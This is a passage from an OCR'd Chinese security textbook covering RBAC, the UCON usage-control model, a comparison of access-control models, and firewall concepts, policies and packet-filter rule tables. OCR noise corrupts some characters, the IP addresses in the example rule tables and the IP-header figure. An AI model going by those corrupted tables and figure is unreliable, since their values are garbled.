改变 。 另 外 ,会 话 期 间 的 访问 控制 决策 的 管理 和 调节 是 由 激活 角色 来 完成 的 。 
目前 , RBAC 被 应 用 在 各 个 领域 ,包括 操作 系统 数据库 管 理 系统 . 公 钥 基础 设施 
(PKD .工作 流 管 理 系统 和 Web 服务 等 。 驱动 RBAC 发 展 的 动力 是 在 简化 安全 策略 管理 的 
同时 允许 灵活 地 定义 安全 策略 ,这 一 点 使 得 过 去 的 几 年 中 无 论 是 对 RBAC 理论 研究 还 是 实 
现 RBAC 的 产品 都 有 了 很 大 的 发 展 。 随 着 RBAC 的 4 层 模型 和 各 种 RBAC 规范 的 逐步 建 
立 ,RBAC 技术 必 将 在 各 领域 中 迅速 发 展 并 得 到 更 为 充分 的 应 用 。 


4.1.5 使 用 控制 模型 


现代 动态 开放 式 网 络 最 大 的 特点 是 动态 性 ,也 就 是 属性 的 易 变 性 和 决策 的 持续 性 ,传统 
的 访问 控制 策略 已 经 不 适应 新 形势 的 要 求 , 其 至 “访问 控制 ”的 概念 也 不 能 很 好 地 反映 实际 。 
因为 “访问 控制 ”的 概念 反映 的 是 静态 的 ,不 变 的 对 授权 访问 的 控制 ,而 现在 对 权限 的 控制 是 
动态 的 、 变 化 的 。 如 果 说 之 前 是 对 数据 “访问 (Access)” 的 控制 ,那么 现在 更 倾向 于 对 数据 
“使 用 (Usage) ”的 控制 。 两 者 的 研究 目的 相同 ,都 是 考虑 信息 系统 中 的 实体 访问 过 程 如 何 
保证 安全 性 的 问题 。 只 是 之 前 的 信息 系统 处 于 静态 当中 ,授权 在 访问 之 前 是 确定 的 ,而 现在 
的 信息 系统 处 于 动态 的 变化 当中 ,授权 在 访问 过 程 中 仍 处 于 变化 当中 ,所 以 提出 “使 用 控制 
(Usage Control) ”的 概念 ,用 来 强调 在 访问 决策 执行 过 程 中 的 控制 。 访 问 控 制 中 的 决策 是 
基于 过 去 的 信息 ,而 使 用 控制 的 决策 是 基于 现在 的 信息 。 所 以 新 一 代 的 访问 控制 策略 可 以 
定义 为 “使 用 控制 (Usage Control) ”策略 , 记 作 UCON。 这 是 2002 年 由 George Mason 大 学 
著名 的 信息 安全 专家 (Ravi Sandhu) 首 次 提出 的 。UCON 对 传统 的 存 取 控制 进行 了 扩展 ， 
定义 了 授权 规则 、 义 务 和 条 件 3 个 决定 性 因素 ,同时 提出 了 存 取 控制 的 连续 性 和 可 变性 两 个 
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要 属性 。UCON 集合 了 传统 的 访问 控制 ,信任 管理 以 及 数字 版 权 管 理 , 用 系统 的 方式 提 
供 了 一 个 保护 数字 资源 的 统一 标准 的 框架 ,为 下 一 代 存 取 控制 机 制 提供 了 新 的 思路 。 

使 用 控制 模型 UCON 包含 3 个 基本 元 素 : 

(1) 主体 (subject)。 是 和 一 些 属性 相关 联 , 并 且 拥 有 和 在 对 象 上 执行 某 种 权利 的 实体 。 
属性 是 主体 能 够 用 于 授权 过 程 的 一 些 特定 的 性 质 。 例 如 ,身份 标识 、 角 色 、 信 用 卡 账号 、 成 员 
关系 安全 标签 等 都 是 属性 。 一 个 主体 可 以 是 一 个 用 户 、 一 个 组 一 个 角色 或 者 一 个 进程 。 
一 个 用 户 是 在 系统 中 注册 并 且 准 备 访问 系统 的 实体 。 一 个 组 是 多 个 拥有 相同 权限 的 用 户 
集 。 一 个 角色 是 用 户 和 相关 权限 的 集合 体 。 组 和 角色 也 可 以 具有 层次 关系 。 

(2) 客体 (object) 。 是 主体 在 上 面 拥有 权利 的 实体 。 因 此 ,主体 可 以 访问 或 使 用 客体 。 
客体 自身 具有 某 种 属性 ,或 者 和 权限 一 起 关联 于 某 些 属性 。 与 主体 相对 应 的 是 这 些 属性 也 
是 可 以 应 用 于 授权 过 程 中 。 例 如 ,安全 标签 .成员 关 系 、 客 体 的 类 别 等 都 可 以 看 作客 体 的 属 
性 ,对 象 的 类 别 用 于 区 分 具有 某 些 相同 属性 的 同一 类 对 象 ,因此 ,不 仅 可 以 对 某 个 具体 的 对 
象 进行 授权 ,而 且 可 以 对 同一 类 的 对 象 进行 授权 。 

(3) 权限 (right)。 权 限 是 由 一 个 主体 能 够 对 客体 进行 操作 的 功能 的 集合 。 权 限 的 授权 
过 程 同 主体 和 客体 密切 相关 。 权 限 之 间 也 可 以 具有 层次 关系 。 类 似 于 主体 和 客体 ,权限 也 
可 以 分 为 各 种 不 同类 型 , 它 不 但 包括 对 客体 的 使 用 和 访问 权限 ,而 且 包 括 权限 的 委托 。 

另外 ,UCON 模型 还 包括 3 个 与 授权 有 关 的 元 素 : 

(1) 授权 规则 (authorization rule)。 是 在 允许 一 个 主体 访问 或 使 用 对 象 之 前 必须 满足 
的 一 系列 安全 需求 的 集合 。 这 里 存在 两 种 类 型 的 授权 规则 , 即 与 权限 相关 的 授权 规则 和 与 
义务 相关 的 授权 规则 。 授 权 规 则 用 来 检查 一 个 主体 是 否 具有 对 某 个 对 象 执行 特定 权限 的 有 
效 授权 。 比 较 典 型 的 例子 包括 身份 标识 和 角色 验证 ,主体 能 力 和 安全 属性 检查 ,是 否 付款 的 
证 明 等 。 义 务 规则 用 来 检查 某 一 个 主体 是 否 同意 执行 义务 ,该 义务 是 主体 获得 和 执行 对 某 
个 对 象 的 权限 以 后 不 得 不 履行 的 义务 。 比 如 ,主体 在 执行 权限 以 前 必须 付款 .汇报 使 用 日 志 
信息 等 。 

(2) 条 件 (condition) 。 是 系统 在 授权 过 程 中 应 当 检验 的 一 系列 决定 性 的 因素 ,该 过 程 
是 指 根据 一 定 的 授权 规则 在 允许 主体 访问 之 前 必须 满足 的 条 件 约束 。 条 件 可 以 分 为 动态 条 
件 和 静态 条 件 。 动 态 条 件 是 指 在 每 次 允许 访问 请 求 之 前 都 必须 进行 检查 和 更 新 的 信息 , 静 
态 条 件 是 每 次 不 需要 检查 和 更 新 的 信息 。 动 态 条 件 是 有 状态 的 ,而 静态 条 件 是 无 状态 的 。 

(3) 义务 (obligation)。UCON 模型 将 义务 、 条 件 和 授权 作为 使 用 决策 进程 的 一 部 分 ， 
提供 了 更 好 的 决策 能 力 。 授 权 是 基于 主体 、 客 体 的 属性 以 及 所 请 求 的 权利 进行 的 ,每 一 次 访 
问 都 有 有 限 的 期 限 ,在 访问 之 前 往往 需要 授权 ,而且 在 访问 的 过 程 中 也 可 能 需要 授权 。 

义务 就 是 指 主体 在 获得 或 执行 对 某 个 对 象 的 权限 之 后 不 得 不 履行 的 强制 性 的 安全 需 
求 。 然 而 ,在 现实 的 系统 中 ,义务 或 许 应 当 在 主体 获得 权限 和 进行 基于 义务 的 授权 规则 实施 
以 前 完成 。 比 如 ,一 个 顾客 在 获得 使 用 某 个 数字 信息 以 前 必须 签订 同意 付款 的 协议 ,在 读 一 
本 电子 图 书 或 播放 一 首 音 乐 以 前 同意 向 提供 者 主体 汇报 有 关 的 使 用 日 志文 件 。 

可 变 属性 (Mutable Attribute, MA) 的 引入 是 UCON 模型 与 其 他 访问 控制 模型 最 大 的 
差别 ,可 变 属性 会 根据 访问 对 象 的 结果 而 改变 ,而 不 可 变 属性 仅 能 通过 管理 行为 改变 。 
UCON 模型 不 仅 包 含 了 DAC、MAC 和 RBAC, 而 且 还 包含 了 数字 版 权 管理 (Digital Rights 
Management ,DRM) 信任 管理 等 ,涵盖 了 现代 商务 和 信息 系统 需求 中 的 安全 和 隐私 这 两 个 
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重要 的 问题 。 因 此 ,UCON 模型 为 研究 下 一 代 访 问 控制 提供 了 一 种 新 方法 ,被 称 作 下 一 代 
访问 控制 模型 。 


4.1.6 几 种 模型 的 比较 


访问 控制 策略 最 常用 的 是 主动 访问 控制 .强制 访问 控制 和 基于 角色 的 访问 控制 。DAC 
根据 主体 的 身份 和 授权 来 决定 访问 模式 ,但 在 信息 移动 过 程 中 主体 可 能 会 将 访问 权限 传递 
给 其 他 人 ,使 访问 权限 关系 发 生 改变 ; MAC 根据 主体 和 客体 的 安全 级 别 标记 来 决定 访问 模 
式 , 实 现 信息 的 单 向 流动 ,但 它 过 于 强调 保密 性 ,系统 的 授权 管理 不 便 ,不 够 灵活 。 因 此 ， 
DAC 限制 太 弱 ,MAC 限制 太 强 , 且 二 者 的 工作 量 较 大 ,不便 管理 。 

RBAC 模型 与 传统 的 DAC 和 MAC 相 比 具有 显著 的 优点 。 首 先 ,RBAC 模型 是 一 种 与 
策略 无 关 的 访问 控制 技术 , 它 不 局 限于 特定 的 安全 策略 ,几乎 可 以 描述 任何 安全 策略 。 其 
次 ,RBAC 模型 具有 自我 管理 能 力 。 再 次 ,RBAC 模型 使 得 安全 管理 更 贴近 应 用 领域 的 机 构 
或 组 织 的 实际 情况 ,很 容易 将 现实 世界 的 管理 方式 和 安全 策略 映射 到 信息 系统 中 。 此 外 ， 
RBAC 模型 便于 实施 整个 组 织 或 单位 的 网 络 信息 系统 的 安全 策略 ,提高 网 络 服务 的 安全 性 。 

但 RBAC 模型 仍 存在 一 定 的 局 限 性 。RBAC 模型 的 基本 出 发 点 是 以 主体 为 中 心 来 考 
虑 整个 安全 系统 的 访问 控制 ,所 以 只 针对 有 关 主 体 的 安全 特性 进行 了 深入 研究 ,而 没有 涉及 
有 关 访 问 控制 中 的 客体 和 访问 约束 条 件 的 安全 特性 等 内 容 , 这 样 就 忽略 了 访问 控制 过 程 中 
对 客体 和 访问 事务 的 安全 特性 的 抽象 ,从 而 可 能 造成 整个 安全 系统 安全 策略 的 不 平衡 ,降低 
了 模型 对 现实 世界 的 表达 力 和 可 用 度 。 

UCON 引入 了 可 变 属性 ,可 以 根据 访问 对 象 的 结果 而 改变 ,是 下 一 代 访问 控制 模型 。 





4.2 集中 式 防 火 墙 技术 


4.2.1 防火 墙 的 概念 


防火 墙 起 源 于 古 时 候 用 来 隔离 火灾 的 砖 墙 ,人 们 在 寅 所 之 间 砌 起 一 道 砖 墙 ,一 旦 火灾 发 
生 , 它 能 够 防止 火势 葛 延 到 别 的 富 所 。 这 种 墙 因此 而 得 名 “防火 墙 ”, 主 要 用 于 火势 隔离 。 现 
在 ,如 果 一 个 单位 的 内 部 网 络 与 Internet 连接 , 它 的 用 户 就 可 以 访问 外 部 世界 并 与 之 通信 。 
但 同时 ,外 部 世界 也 可 以 访问 该 网 络 并 与 之 交互 。 为 安全 起 见 , 可 以 在 该 网 络 和 Internet 之 
间 搬 入 一 个 隔离 系统 , 竖 起 一 道 安全 屏障 。 对 外 ,这 道 屏 障 能 够 阻 断 来 自 外 部 通过 Internet 
对 内 部 网 络 的 威胁 和 入 侵 , 提 供 扼守 本 网 络 安全 和 审计 的 唯一 关卡 ; 对 内 ,这 道 屏障 能 够 控 
制 用 户 对 外 部 的 访问 。 这 种 中 介 系 统 也 叫做 “防火 墙 ?或 防火墙 系 统 ”。 这 种 防火 墙 一 般 位 
于 网 络 的 边界 ,因此 也 经 常 称 之 为 "边界 防火 墙 ?或 者 “集中 式 防 火 墙 ”。 

防火 墙 是 设置 在 用 户 网 络 和 外 界 之 间 的 一 道 屏障 ,防止 不 可 预料 的 、 潜 在 的 破坏 侵入 用 
户 网 络 。 防 火 墙 在 开放 和 封闭 的 界面 上 构造 一 个 保护 层 ,属于 内 部 范围 的 业务 ,依照 协议 在 
授权 许可 下 进行 ,外 部 对 内 部 网 络 的 访问 则 受到 防火 墙 的 限制 。 

总 之 ,防火 墙 在 一 个 被 认为 是 安全 和 可 信 的 内 部 网 络 和 一 个 被 认为 是 不 太 安全 和 可 信 
的 外 部 网 络 ( 如 Internet) 之 间 提 供 一 个 封锁 工具 ,增强 机 构 内 部 网 络 的 安全 性 。 防 火 墙 用 
于 加 强 网 络 间 的 访问 控制 ,防止 外 部 用 户 非法 使 用 内 部 网 的 资源 ,保护 内 部 网 络 的 设备 不 被 
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破坏 ,保证 内 部 网 络 的 敏感 数据 不 被 窃取 。 防 火 墙 系统 决定 了 外 界 的 哪些 人 可 以 访问 内 部 
的 哪些 可 以 访问 的 服务 ,以 及 哪些 外 部 服务 可 以 被 内 部 人 员 访 问 。 要 使 一 个 防火 墙 有 效 , 所 
有 来 自 和 通 向 Internet 的 信息 都 必须 经 过 防火 墙 ,接受 防火 墙 的 检查 。 防 火 墙 只 允许 授权 
的 数据 通过 ,并 且 防 火 墙 本 身 也 必须 能 够 免 于 渗透 。 防 火 墙 系统 一 旦 被 攻击 者 突破 或 绕 过 ， 
就 不 能 提供 任何 的 保护 了 。 可 以 说 ,防火 墙 是 保护 网 络 安全 的 第 一 道 屏障 。 

一 般 地 ,防火墙 具 有 以 下 功能 : 

(1) 过 滤 。 对 进出 网 络 的 数据 包 进 行 过 滤 ,根据 过 滤 规 则 决定 哪些 数据 包 可 以 进入 , 哪 
些 数据 包 可 以 外 出 , 封 堵 某 些 禁 止 的 访问 行为 。 如 同 海关 检查 ,可 以 决定 哪些 人 可 以 人 境 ， 
哪些 人 可 以 出 境 , 而 判定 的 依据 就 称 为 过 滤 规则 。 

(2) 管理 。 对 进出 网 络 的 访问 行为 进行 管理 ,决定 哪些 服务 端口 需要 关闭 ,哪些 服务 端 
口 可 以 开放 。 在 采用 TCP/IP 协议 的 网 络 中 ,网 络 服务 (如 WWW、FTP 等 ) 都 是 以 主机 IP 
地 址 和 端口 号 来 标识 的 ,所 有 客户 都 可 以 向 这 些 端口 发 起 连接 请 求 , 要 求 主 机 提供 服务 。 这 
种 情况 也 类 似 于 各 个 海关 通道 ,可 以 决定 开放 哪些 通道 ,关闭 哪些 通道 。 

(3) 日 志 。 防 火 墙 通过 记录 经 过 它 进行 的 各 种 网 络 资源 访问 行为 ,形成 日 志 。 正 常情 
况 下 ,大 部 分 访问 行为 是 合法 的 ,但 也 存在 一 些 可 能 是 进行 和 人 侵 的 尝试 行为 ,如 进行 端口 扫 
描 。 系 统管 理 员 可 以 通过 对 日 志 内 容 的 查看 和 分 析 来 进行 判断 。 

(4) 告警 。 对 网 络 攻击 行为 进行 检测 并 告警 。 

以 上 是 防火 墙 应 该 具备 的 最 基本 的 功能 ,有 的 防火 墙 还 会 提供 一 些 其 他 更 加 高 级 的 功 
能 ,如 支持 多 端口 连接 ,支持 基于 Web 的 管理 等 。 不 管 是 哪 种 防火 墙 ,防火 墙 的 设计 应 该 满 
足以 下 原则 之 一 : 

(1) 封闭 原则 。 这 是 一 刀 切 的 方法 ,其 基本 思想 是 “禁止 所 有 , 逐 项 开放 ”。 基 于 这 个 准 
则 ,防火墙 应 封锁 所 有 信息 流 , 然 后 对 希望 提供 的 安全 服务 逐 项 开放 ,对 不 安全 的 服务 或 可 
能 有 安全 隐患 的 服务 一 律 禁 示 。 这 是 一 种 非常 有 效 实 用 的 方法 ,可 以 构成 一 种 十 分 安全 的 
环境 ,因为 只 有 经 过 仔细 挑选 的 服务 (如 WWW 服务 ) 才 能 允许 用 户 使 用 。 但 同时 也 可 能 对 
用 户 造成 一 些 不 便 ,如 一 些 有 用 的 服务 (FTP、Telnet 等 ) 通 常 由 于 存在 安全 问题 而 会 被 
关闭 。 

(2) 开放 原则 。 其 基本 思想 是 “人 允许 所 有 , 逐 项 禁止 >。 基 于 这 个 准则 ,防火墙 应 先 允许 
所 有 的 用 户 和 站 点 对 内 部 网 络 的 访问 ,然后 网 络 管理 员 按照 IP 地 址 对 未 授权 的 用 户 或 不 信 
任 的 站 点 进行 逐 项 屏 项。 这 种 方法 构成 了 一 种 更 为 灵活 的 应 用 环境 ,网 络 管理 员 可 以 针对 
不 同 的 服务 面向 不 同 的 用 户 开放 ,也 就 是 能 自由 地 设置 各 个 用 户 的 不 同 访问 权限 。 但 如 果 
用 户 范围 过 大 ,这 种 方法 实施 的 工作 量 将 会 十 分 巨大 。 

利用 防火 墙 来 保护 内 部 网 主要 有 以 下 几 个 方面 的 优点 : 

(1) 单一 入 口 。 允 许 网 络 管理 员 定 义 一 个 中 心 “ 扼 制 点 ”来 防止 非法 用 户 ( 如 黑客 、 网 络 
破坏 者 等 ) 进 入 内 部 网 络 。 禁 止 使 用 脆弱 的 安全 服务 ,并 抗击 来 自 各 种 途径 的 攻击 。 防 火 墙 
能 够 简化 安全 管理 ,网 络 安全 性 通过 防火 墙 系统 得 到 加 固 ,而 不 是 分 布 在 内 部 网 络 的 所 有 主 
机 上 。 

(2) 保护 网 络 中 脆弱 的 服务 。 防 火 墙 通过 过 滤 存 在 安全 缺陷 的 网 络 服务 来 降低 内 部 网 
遭受 攻击 的 威胁 ,因为 只 有 经 过 选择 的 网 络 服务 才能 通过 防火 墙 。 例 如 ,防火 墙 可 以 禁止 某 
些 易 受 攻击 的 服务 (如 FTP、Telnet 等 ) ,这 样 可 以 防止 这 些 服务 被 外 部 攻击 者 利用 ,但 在 内 
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部 网 中 仍 可 以 使 用 这 些 比较 有 用 的 服务 ,减轻 内 部 网 络 的 管理 负担 。 

(3) 通过 防火 墙 ,用 户 可 以 很 方便 地 监视 网 络 的 安全 性 ,并 产生 报警 信息 。 网 络 管理 员 
必须 审计 并 记录 所 有 通过 防火 墙 的 重要 信息 。 如 果 网 络 管理 员 不 能 及 时 响应 报警 并 审查 常 
规 记录 ,防火 墙 就 形同虚设 。 在 这 种 情况 下 ,网 络 管理 员 永 远 不 会 知道 防火 墙 是 否 受 到 
攻击 。 

(4) 集中 安全 性 。 如 果 一 个 内 部 网 络 的 所 有 或 大 部 分 需要 改动 的 程序 以 及 附加 的 安全 
程序 都 能 集中 地 放 在 防火 墙 系统 中 ,而 不 是 分 散 到 每 个 主机 中 ,防火 墙 的 保护 范围 就 相对 集 
中 ,安全 成 本 也 较 低 。 尤 其 对 于 口令 系统 或 身份 认证 软件 等 ,将 它们 放 在 防火 墙 系统 中 要 优 
于 放 在 每 个 外 部 网 络 都 能 访问 的 主机 上 。 

(5) 增强 隐私 性 。 对 一 些 内 部 网 络 节点 而 言 ,隐私 性 是 很 重要 的 , 某 些 看 似 不 甚 重 要 的 
信息 往往 会 成 为 攻击 者 攻击 的 开始 。 例 如 ,攻击 者 可 以 通过 DNS 获取 一 些 主机 信息 ,一旦 
攻击 者 了 解 到 这 些 信 息 , 就 可 以 锁定 攻击 目标 ,并 进行 下 一 步 和 人 侵 准 备 。 防 火 墙 能 封锁 这 类 
服务 ,从 而 使 得 外 部 网 络 主机 无 法 获取 这 些 有 利于 攻击 的 信息 。 

(6) 防火 墙 是 审计 和 记录 网 络 流量 的 最 佳 地 方 。 网 络 管理 员 可 以 在 此 向 管理 部 门 提 供 
Internet 连接 的 费用 情况 , 查 出 潜在 的 带宽 瓶颈 位 置 ,并 能 够 根据 机 构 的 核算 模式 提供 部 门 
级 的 计 费 。 

虽然 防火 墙 可 以 提高 内 部 网 的 安全 性 ,但 是 防火 墙 也 有 它 的 一 些 缺陷 和 不 足 , 具 体 
如 下 : 

(1) 限制 有 用 的 网 络 服 务 。 防 火 墙 为 了 提高 被 保护 网 络 的 安全 性 ,限制 或 关闭 了 很 多 
有 用 但 存在 安全 缺陷 的 网 络 服务 (如 FTP、Telnet 等 )。 由 于 绝 大 多 数 网 络 服务 设计 之 初 根 
本 没有 考虑 安全 性 ,只 考虑 使 用 的 方便 性 和 资源 共享 ,所 以 都 存在 安全 问题 。 如 果 防 火 墙 限 
制 这 些 网 络 服务 ,这 些 服务 将 不 能 给 用 户 提供 便利 。 

(2) 不 能 有 效 防 护 内 部 网 络 用 户 的 攻击 。 目 前 大 部 分 防火 墙 只 提供 对 外 部 网 络 用 户 攻 
击 的 防护 。 对 来 自 内 部 网 络 用 户 的 攻击 只 能 依靠 内 部 网 络 主机 系统 的 安全 性 。 防 火 墙 无 法 
禁止 内 部 用 户 对 网 络 主机 的 各 种 攻击 ,因此 ,堡垒 往往 从 内 部 被 攻破 。 所 以 必须 对 员工 进行 
教育 和 培训 ,让 他 们 了 解 网 络 攻击 的 各 种 类 型 ,并 懂得 保护 自己 的 用 户口 令 和 周期 性 变换 口 
令 的 必要 性 ,使 他 们 一 方面 不 去 攻击 其 他 员工 , 另 一 方面 也 不 至 于 成 为 内 部 攻击 的 牺牲 品 。 

(3) 对 网 络 拓扑 结构 依赖 性 大 。 防 火 墙 必须 设置 在 内 部 网 络 外 出 的 唯一 出 口 处 , 它 无 
法 防范 通过 防火 墙 以 外 的 其 他 途径 发 动 的 攻击 。 例 如 ,在 一 个 被 防火 墙 保护 的 网 络 上 设置 
一 个 没有 经 过 防火 墙 控制 的 远程 访问 服务 器 (如 用 Windows NT 充当 ) ,内 部 网 络 上 的 用 户 
就 可 以 直接 通过 点 到 点 协议 (Point to Point Protocol, PPP) 连 接 进 入 Internet, 从 而 绕 过 由 
精心 构造 的 防火 墙 提供 的 安全 系统 。 这 就 使 内 部 网 络 容易 遭受 攻击 。 网 络 上 的 用 户 必 须 认 
识 到 这 种 类 型 的 连接 对 于 一 个 全 面 的 安全 保护 系统 来 说 是 绝对 不 允许 的 。 

(4) 防火 墙 不 能 完全 阻止 传送 已 感染 病毒 的 软件 或 文件 。 这 是 因为 病毒 的 类 型 很 多 ， 
操作 系统 也 有 多 种 ,编码 与 压缩 二 进 制 文件 的 方法 也 各 不 相同 。 所 以 不 能 期 望 防火 墙 对 每 
一 个 文件 进行 扫描 , 查 出 潜在 的 病毒 。 解 决 该 问题 的 有 效 方法 是 每 个 客户 机 和 服务 器 都 安 
装 专用 的 网 络 防 病毒 系统 ,从 源头 防止 病毒 从 U 盘 或 其 他 来 源 进入 网 络 系统 。 

(5) 防火 墙 无 法 防范 数据 驱动 型 的 攻击 。 数 据 驱 动 型 的 攻击 从 表面 上 看 是 无 害 的 数据 
被 邮寄 或 复制 到 主机 上 ,一 旦 打开 这 种 数据 就 启动 了 攻击 。 例 如 ,一 个 用 户 收 到 一 封号 称 来 
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自 好 友 的 邮件 ,该 邮件 带 有 附件 ,一 旦 打开 该 附件 ,将 破坏 整个 系统 ,这 是 一 种 典型 的 数据 驱 
动 型 攻击 。 一 个 数据 驱动 型 攻击 可 能 导致 主机 修改 与 安全 相关 的 文件 ,使 得 入 侵 者 很 容易 
获得 对 系统 的 访问 权 。 

(6) 不 能 防备 新 的 网 络 安全 问题 。 防 火 墙 是 一 种 被 动 式 的 防护 手段 , 它 只 能 对 已 知 的 
网 络 威胁 起 作用 。 随 着 网 络 攻击 手段 的 不 断 更 新 和 一 些 新 的 网 络 应 用 的 出 现 , 不 可 能 靠 一 
次 性 的 防火 墙 设置 一 劳 永 逸 地 解决 所 有 的 网 络 安全 问题 。 

(7) 不 能 解决 信息 保密 性 问题 。 防 火 墙 仅仅 是 一 个 关口 ,数据 包 通过 这 个 关口 后 ,防火 
墙 就 不 管 了 。 就 如 同 旅客 通过 海关 后 ,其 在 海外 的 行为 就 超出 了 海关 管辖 的 范围 。 因 此 , 通 
过 防火 墙 在 Internet 上 传输 的 数据 包 可 能 被 窃听 或 自 改 ,防火 墙 对 此 无 法 预见 和 处 理 , 因 为 
它 本 身 不 对 进出 的 数据 包 进行 任何 加 解密 操作 。 


4.2.2 防火 墙 策略 


为 网 络 建立 防火 墙 ,首先 要 决定 防火 墙 将 采取 何 种 安全 控制 基本 准则 。 一 个 防火 墙 应 
该 使 用 以 下 两 种 基本 策略 中 的 一 种 。 

(1) 未 经 明确 允许 的 一 律 禁止 。 

这 种 方法 堵塞 了 两 个 网 络 之 间 的 所 有 数据 传输 ,除了 那些 被 明确 允许 的 服务 和 应 用 
程序 。 
因此 ,应 该 逐个 定义 每 一 个 允许 的 服务 和 应 用 程序 ,而 任何 一 个 可 能 成 为 防火 墙 漏洞 的 
服务 和 应 用 程序 都 不 能 允许 使 用 。 

这 是 一 个 最 安全 的 方法 ,但 从 用 户 的 角度 来 看 ,这 样 可 能 会 有 很 多 限制 ,不 是 很 方便 。 
一 般 在 防火 墙 配置 中 都 会 使 用 这 种 策略 。 

表 4.1 是 数据 包 过 滤 规 则 的 示例 ,根据 这 些 规则 ,防火 墙 便 可 对 各 项 实际 通信 的 数据 包 
进行 过 滤 , 有 的 数据 包 能 通过 ,有 的 则 遭 到 拒绝 。 


表 4.1 防火 墙 规则 列表 示例 1 





规则 来 源 IP 地 址 目的 IP 地 址 类 型 ”来 源 端 口号 目的 端口 号 动作 
间 140. 130. 149. * 140. 112. *.* TCP 任意 23(Telnet) 通过 
$ 140. 112. #.* 140. 130. 149. * TCF 23 任意 通过 
3 140。 关 。 关 。 关 140。 关 。 关 。 关 TCP 任意 25(E-mail) 通过 
4 任意 任意 任意 任意 任意 拒绝 


表 4.1 显示 的 就 是 一 个 典型 的 “未 经 明确 允许 的 一 律 禁止 ?的 防火 墙 规则 。 从 表 中 可 
见 ,规则 1 一 3 显示 的 是 明确 允许 通过 的 规则 , 即 来 自 某 一 个 目标 段 地址 到 某 一 目标 的 
E-mail、Telnet 等 应 用 。 而 最 后 一 条 规则 是 除了 以 上 允许 的 规则 以 外 其 他 全 部 禁止 。 

(2) 未 经 明确 禁止 的 一 律 允许 。 

这 种 方法 允许 两 个 网 络 之 间 所 有 数据 传输 ,除非 某 些 服 务 和 应 用 程序 被 明确 禁止 。 

因此 ,每 一 个 不 信任 或 有 潜在 危害 的 服务 和 应 用 程序 都 应 该 逐个 拒绝 。 虽 然 这 对 用 户 
是 一 个 灵活 和 方便 的 方法 , 它 却 可 能 存在 严重 的 安全 隐患 。 

同样 以 防火 墙 规则 来 进行 示例 ,如 表 4. 2 所 示 。 
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表 4.2 防火 墙 规则 列表 示例 2 





规则 来 源 IP 地 址 目的 IP 地 址 类 型 来 源 端口 号 目的 端口 号 动作 
1 20. 210. 21. 72 任意 任意 任意 任意 拒绝 
2 140. 130. 149. * 140. 112. #* . * TCF 任意 23(Telnet) 拒绝 
3 任意 140. 130. 149. * TCP 任意 22(SSH) 拒绝 
4 任意 任意 任意 任意 任意 通过 


表 4.2 显示 的 就 是 一 个 典型 的 “未 经 明确 禁止 的 一 律 允 许 ” 的 防火 墙 规则 。 规 则 1 一 3 
分 别 拒绝 了 某 一 IP 的 访问 ,还 禁止 了 Telnet 以 及 SSH 的 远程 登录 访问 。 而 最 后 一 条 规则 
是 除了 以 上 禁止 的 规则 以 外 其 他 全 部 允许 。 

总 之 ,从 安全 性 的 角度 考虑 ,第 一 种 准则 更 可 取 一 些 ; 而 从 灵活 性 和 使 用 方便 性 的 角度 
考虑 ,第 二 种 准则 更 适合 。 


4.2.3 防火 墙 体系 结构 


常见 的 防火 墙 可 以 归 为 3 类 , 即 包 过 滤 防 火 墙 , 双 宿 网 关 防 火 墙 和 屏蔽 子 网 防火 墙 。 这 
几 种 防火 墙 的 安全 级 别 不 同 , 包 过 滤 是 最 基本 最 简单 的 一 种 ,几乎 所 有 的 路 由 器 都 支持 这 种 
功能 ,屏蔽 子 网 防火 墙 是 比较 高 级 的 一 种 安全 防护 方式 。 

4.2.3.1 包 过 滤 型 防火 墙 

顾名思义 , 包 过 滤 型 防火 墙 就 是 通过 包 过 滤 技 术 实现 对 进出 数据 的 控制 。 

包 过 滤 有 多 种 英文 名 称 , 如 packet filter( 包 过 滤 )、screen filter( 筛 选 过 滤器 ) .network 
level firewall( 网 络 层 防火 墙 ) IP filter(IP 过 滤器 ) 。 

一 个 典型 的 包 过 滤 防 火 墙 的 连接 示意 图 如 4.4 所 示 。 







根据 规则 决定 .7 
是 否 转发 包 ,.” 







i 


图 4.4 包 过 滤 防 火 墙 构造 示意 图 


包 过 滤 防 火 墙 在 网 络 层 对 进出 内 部 网 络 的 所 有 信息 进行 分 析 , 并 按照 一 定 的 安全 策略 
(信息 过 滤 规 则 ) 进 行 筛选 ,允许 授权 信息 通过 ,拒绝 非 授 权 信息 。 在 内 部 网 络 和 外 部 网 络 之 
间 ,路 由 器 起 着 “一 夫 当 关 ?的 作用 ,因此 , 包 过 滤 防 火 墙 一般 通 过 路 由 器 实现 ,这 种 路 由 器 也 
称 为 包 过 滤 路 由 器 。 

信息 过 滤 规 则 以 收 到 的 数据 包 的 头 部 信息 (实际 就 是 IP 报头 ) 为 基础 进行 处 理 , IP 报 
头 的 格式 如 图 4. 5 所 示 。 

包 过 滤 路 由 器 一 般 检查 报头 部 分 的 以 下 内 容 : 
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优先 级 | D | T | R | c [未 用 
0 3 4 8 15 18 31 
版 本 Se 服务 类 型 总 长 度 (<65 535B) 
分 段 标识 (表示 属于 同一 数据 报 ) 下 | | 择 | 。 自 偏 移 ( 以 SB 为 单位 
生命 期 TL( 和 ) 上 层 协议 首部 检验 和 
源 IP 地 赴 
目的 IP 地 址 
可 选 字段 (>0) 
DF 是否 分 段 ; MF : 是 否 有 后 续 分 段 
图 4.5 IP 报 头 格式 


。 源 IP 地 址 和 目的 IP 地 址 。 

。 上 层 协 议 (ICP、UDP、ICMP 等 ) 。 

。 TCP/UDP 源 端 口 和 TCP/UDP 目标 端口 。 

。 ICMP 消息 类 型 。 

。 TCP 包头 中 的 ACK 位 等 。 

包 过 滤 防 火 墙 能 拦截 和 检查 所 有 出 去 和 进来 的 数据 包 。 防 火 墙 检查 模块 首先 验证 这 个 
包 是 否 符合 过 滤 规则 ,如果 符合 规则 , 则 允许 该 数据 包 通 过 ; 如 果 不 符 合 规则 , 则 进行 报警 
或 通知 管理 员 ,并 且 丢弃 该 包 。 对 丢弃 的 数据 包 , 防 火 墙 可 以 向 发 送 方 返回 一 个 消息 ,也 可 
以 不 返回 消息 ,这 取决 于 包 过 滤 策 略 。 如 果 返 回 一 个 消息 ,攻击 者 可 能 会 根据 拒绝 包 的 类 型 
猜测 包 过 滤 规 则 的 大 致 情况 。 所 以 对 是 否 返 回 一 个 消息 给 发 送 者 要 慎重 处 理 。 

包 过 滤 类 型 的 防火 墙 遵循 的 一 条 基本 原则 是 “最 小 特权 原则 ”, 即 明确 允许 那些 管理 员 
希望 通过 的 数据 包 ,禁止 其 他 的 数据 包 。 

